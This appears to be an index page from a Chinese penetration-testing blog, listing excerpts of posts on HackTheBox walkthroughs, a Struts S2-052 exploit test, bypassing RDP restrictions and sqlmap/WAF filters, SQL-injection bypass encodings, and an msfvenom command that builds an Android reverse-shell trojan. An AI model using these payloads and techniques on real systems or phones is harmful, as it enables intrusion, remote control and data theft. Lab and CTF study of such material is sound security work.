渗透实例二

2018-3-5 / 0评

这可能是我在hackthebox上享受的第一个硬盘盒。里面大部分内容使我很快可以完成整个过程,强烈推荐。 初始枚举 启动nmap来快速扫描 root@kali:~/htb/joker# nmap -sV 10.10.10.21 ...

渗透实例一

2018-3-5 / 0评

需要很大的耐心和大量的枚举,过程也很酷,因为我以前从来没有做过类似的事情。最后很高兴在HackTheBox中看到一个域控制器。 枚举 我们使用nmap进行扫描。 root@kali:~/htb/mantis# nmap -A 10.10.10.52 Starting ...

黑吃黑渗透WEBSHELL箱子

2017-12-12 / 0评

黑吃黑渗透webshell箱子 这是款很老的箱子了,最近用关键字搜索了一下,居然发现还有人使用,那就把很久以前写的教程放出来吧 具体术语内容本文不多做介绍,大家自行百度 环境是本地搭建测试的,大家请勿非法使用 这是一个我本地搭...

S2-052的POC测试,高危Struts REST插件远程代码执行漏洞(S2-052)

2017-9-6 / 0评

S2-052的POC测试,高危Struts REST插件远程代码执行漏洞(S2-052),S2-052的 Poc S2-052的POC测试(原名:Tomcat部署war) 原文地址:http://blog.csdn.net/caiqiiqi/article/details/77861477 从struts2的官网下载最后受...

突破各种对3389连接的访问限制

2017-8-11 / 0评

突破各种对3389连接的访问限制 目标服务器是内网终端端口是你开的话 99%需要端口转发 有时候如果服务器开了终端的话 很有可能映射了也不就需要转发 2. 目标是外网开了3389 但连接不上终端 1. 突破安全狗限制连接终端: 突破安全狗限制连接服务器终端:执行杀安全狗的exe 2. 突破SecureRDP限制连接终端 执行目录 echo...

记一次破解shift后门

2017-7-21 / 0评

今天发现个shell,发现开了3389,想着试试弱口令 弱口令无果 随手按了几下shift键,居然发现有shift键后门   然后果断在shell上找到sethc.exe下载下来,然后载入OD   查找超级字串   找到密码后尝试登录,成功登录     然后你们懂的 结束。阅读全文...

谷歌黑客常见语法

2017-7-17 / 0评

inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名 in...

使用sqlmap绕过防火墙进行注入

2017-7-14 / 1评

现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境...

使用kali生成木马入侵安卓手机

2017-7-14 / 0评

今天给大家分享的是使用kali生成木马入侵安卓手机 行动开始 先查看kali的ip,我的是1.114   然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 5555是设置的端口,可以...

11种绕过防注入的方法

2017-6-30 / 0评

1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 2、通过空格绕过 如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 or' swords' =‘swords'...

1 2 3